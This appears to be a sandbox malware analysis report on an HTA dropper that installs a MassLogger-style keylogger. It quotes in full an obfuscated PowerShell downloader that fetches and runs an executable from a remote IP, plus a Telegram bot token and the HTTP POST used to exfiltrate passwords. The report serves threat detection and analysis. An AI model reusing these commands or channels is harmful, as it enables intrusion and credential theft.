                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\dajivhqI.pif, CommandLine: C:\\Users\\user\\Links\dajivhqI.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\dajivhqI.pif, NewProcessName: C:\Users\user\Links\dajivhqI.pif, OriginalFileName: C:\Users\user\Links\dajivhqI.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 1812, ParentProcessName: csrss.exe, ProcessCommandLine: C:\\Users\\user\\Links\dajivhqI.pif, ProcessId: 7196, ProcessName: dajivhqI.pif
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\csrss[1].exe
                  Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd"", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 1812, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd"", ProcessId: 7772, ProcessName: cmd.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))", CommandLine: PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICA

                  Data Obfuscation

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7120, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline", ProcessId: 6340, ProcessName: csc.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T01:21:48.396382+010020220501A Network Trojan was detected192.227.228.2280192.168.2.549711TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T01:21:48.484654+010020220511A Network Trojan was detected192.227.228.2280192.168.2.549711TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T01:22:15.094543+010020577441Malware Command and Control Activity Detected192.168.2.549719149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T01:22:01.301036+010028032742Potentially Bad Traffic192.168.2.549712193.122.130.080TCP
                  2025-03-13T01:22:12.566684+010028032742Potentially Bad Traffic192.168.2.549712193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T01:22:14.468619+010018100081Potentially Bad Traffic192.168.2.549719149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Roaming\csrss.exeAvira: detection malicious, Label: TR/AD.Nekark.kpgky
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\csrss[1].exeAvira: detection malicious, Label: TR/AD.Nekark.kpgky
                  Source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM", "Telegram Chatid": "6306897853"}
                  Source: dajivhqI.pif.7196.16.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 362, "from": {"id": 7653831104, "is_bot": true, "first_name": "kalidresult", "username": "Khalidresultobot"}, "chat": {"id": 6306897853, "first_name": "Enzo", "type": "private"}, "date": 1741825334, "document": {"file_name": "Userdata.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAIBamfSJTZJu-tPhGFrwOQsUq2Sx_JfAALTEgACQMeZUhbmbnkiTz5MNgQ", "file_unique_id": "AgAD0xIAAkDHmVI", "file_size": 881}, "caption": "user / Passwords /"}}]}
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\csrss[1].exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Roaming\csrss.exeReversingLabs: Detection: 47%
                  Source: mybestgirlfriendwalkingaroundtheworld.htaReversingLabs: Detection: 23%
                  Source: mybestgirlfriendwalkingaroundtheworld.htaVirustotal: Detection: 37%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Compliance

                  barindex
                  Source: C:\Users\user\Links\dajivhqI.pifUnpacked PE file: 16.2.dajivhqI.pif.400000.0.unpack
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49713 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: Binary string: q8C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.pdb source: powershell.exe, 00000003.00000002.1384687174.000000000507B000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: csrss.exe, 0000000B.00000003.1352449792.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000002.1359633832.0000000002D30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: dajivhqI.pif, 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: csrss.exe, 0000000B.00000003.1352449792.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000003.1353349368.0000000000889000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000B.00000002.1359633832.0000000002D30000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E952F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,11_2_02E952F8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h16_2_2869E188
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5E49E1h16_2_2B5E4730
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5E5135h16_2_2B5E4D18
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5EFE11h16_2_2B5EFB68
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5EF561h16_2_2B5EF2B8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5E5135h16_2_2B5E5063
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5EF9B9h16_2_2B5EF710
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5EF109h16_2_2B5EEE60
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2B5E5135h16_2_2B5E4D17
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C1607D5h16_2_2C160498
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16D2C0h16_2_2C16D018
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16AEC8h16_2_2C16AC20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C1602E9h16_2_2C160040
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16D718h16_2_2C16D470
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16B320h16_2_2C16B078
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16B778h16_2_2C16B4D0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C1632F0h16_2_2C1630CD
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16DB70h16_2_2C16D8C8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16DFC8h16_2_2C16DD20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16BBD0h16_2_2C16B928
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16E420h16_2_2C16E178
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16C028h16_2_2C16BD80
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C169060h16_2_2C168DB8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16E878h16_2_2C16E5D0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16C480h16_2_2C16C1D8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C1694B8h16_2_2C169210
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16C8DAh16_2_2C16C630
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16ECD0h16_2_2C16EA28
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C160F1Ah16_2_2C160E70
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C169910h16_2_2C169668
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C160F1Ah16_2_2C160E69
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C161D38h16_2_2C161A90
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16F128h16_2_2C16EE80
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16F580h16_2_2C16F2D8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C169D68h16_2_2C169AC0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C162190h16_2_2C161EE8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16A1C0h16_2_2C169F18
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C1625E8h16_2_2C162340
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16A618h16_2_2C16A370
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C162A40h16_2_2C162798
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16CE68h16_2_2C16CBC0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C16AA70h16_2_2C16A7C8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C162E98h16_2_2C162BF0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C1F0D0Dh16_2_2C1F0B30
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2C1F1697h16_2_2C1F0B30
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then push 00000000h16_2_2C1F4040
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]16_2_2C1F4E4E
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h16_2_2C1F0853
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then push 00000000h16_2_2C1F4B96
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h16_2_2C1F0673
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h16_2_2C1F0040
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]16_2_2C7D58B3
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]16_2_2C7D294C

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.227.228.22:80 -> 192.168.2.5:49711
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.227.228.22:80 -> 192.168.2.5:49711
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49719 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49719 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 00:21:48 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 11 Mar 2025 06:36:00 GMTETag: "1dbc00-6300b4d59f46a"Accept-Ranges: bytesContent-Length: 1948672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 2a 06 00 00 8e 17 00 00 00 00 00 ac 47 06 00 00 10 00 00 00 50 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 1e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 1c 00 ca 27 00 00 00 30 1d 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 1c 00 bc 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 1c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 77 1c 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 20 06 00 00 10 00 00 00 22 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 f4 07 00 00 00 40 06 00 00 08 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 1c d7 15 00 00 50 06 00 00 d8 15 00 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c4 36 00 00 00 30 1c 00 00 00 00 00 00 06 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ca 27 00 00 00 70 1c 00 00 28 00 00 00 06 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 a0 1c 00 00 00 00 00 00 2e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 b0 1c 00 00 02 00 00 00 2e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 6e 00 00 00 c0 1c 00 00 70 00 00 00 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 1c 01 00 00 30 1d 00 00 1c 01 00 00 a0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 50 1e 00 00 00 00 00 00 bc 1d
                  Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306897853&caption=user%20/%20Passwords%20/ HTTP/1.1Content-Type: multipart/form-data; boundary================8dd61a39278e6c1Host: api.telegram.orgContent-Length: 1076Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 193.122.130.0:80
                  Source: global trafficHTTP traffic detected: GET /54/csrss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.227.228.22Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49713 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
